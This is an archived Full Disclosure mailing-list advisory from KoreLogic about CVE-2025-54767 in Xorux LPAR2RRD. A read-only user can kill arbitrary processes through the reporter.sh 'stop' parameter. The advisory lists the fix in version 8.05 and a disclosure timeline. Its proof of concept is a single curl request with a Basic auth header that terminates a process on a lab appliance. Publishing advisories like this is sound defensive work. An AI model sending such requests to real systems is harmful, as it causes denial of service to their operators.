| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <98d771ac-707c-45ac-bb79-52958c6dd939@korelogic.com>
Date: Mon, 28 Jul 2025 18:40:28 -0500
From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of
Service
KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of Service
Title: Xorux LPAR2RRD Read Only User Denial of Service
Advisory ID: KL-001-2025-014
Publication Date: 2025-07-28
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-014.txt
1. Vulnerability Details
Affected Vendor: Xorux
Affected Product: LPAR2RRD
Affected Version: 8.04 and prior
Platform: Rocky Linux 8.10
CWE Classification: CWE-648: Incorrect Use of Privileged APIs
CVE ID: CVE-2025-54767
2. Vulnerability Description
An authenticated, read-only user can kill any processes running
on the Xormon Original virtual appliance as the lpar2rrd user.
3. Technical Description
The web application endpoint of
https://<ip>/lpar2rrd-cgi/reporter.sh calls
../bin/reporter_cfg.pl, which contains a URL parameter command
called "stop" which allows an attacker to specify a process ID
(PID) to stop. The web application, running as the lpar2rrd
user, then kills the process on the virtual appliance. This
could be used to stop the webserver, the xormon.war web
application or the lpar2rrd-daemon process, creating a denial
of service (DoS) condition.
4. Mitigation and Remediation Recommendation
Xorux released version 8.05, which includes a remediation
for this vulnerability. See https://lpar2rrd.com/note800.php.
5. Credit
This vulnerability was discovered by Jim Becher of KoreLogic,
Inc.
6. Disclosure Timeline
2025-07-17 : KoreLogic requests point-of-contact to securely
report several vulnerabilities to Xorux.
2025-07-18 : Vendor provides support@...ux.com as the
point-of-contact, noting that they do not use PGP.
2025-07-21 : KoreLogic submits this vulnerability and four
additional discoveries to Xorux.
2025-07-23 : Vendor acknowledges receipt, stating that the issue
has been remediated and a new version of the
affected product will be available 2025-07-25.
2025-07-25 : Xorux publishes updated version of the affected
product.
2025-07-28 : KoreLogic public disclosure.
7. Proof of Concept
On the Xormon Original virtual appliance:
[lpar2rrd@...ux ~]$ ps -efww | grep lpar2rrd | grep bash
lpar2rrd 185824 185823 0 May27 pts/0 00:00:00 -bash
lpar2rrd 1777882 185824 0 13:40 pts/0 00:00:00 grep --color=auto bash
[lpar2rrd@...ux ~]$
From attacker box:
attacker $ curl -k -H "Authorization: Basic amJlY2hlcjpqYmVjaGVy"
'https://172.31.255.207/lpar2rrd-cgi/reporter.sh?cmd=stop&pid=185824'
{"status":"terminated"}
On the Xormon Original virtual appliance:
[lpar2rrd@...ux ~]$ Connection to 172.31.255.207 closed.
attacker $
The contents of this advisory are copyright(c) 2025
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
Download attachment "OpenPGP_signature.asc" of type "application/pgp-signature" (841 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists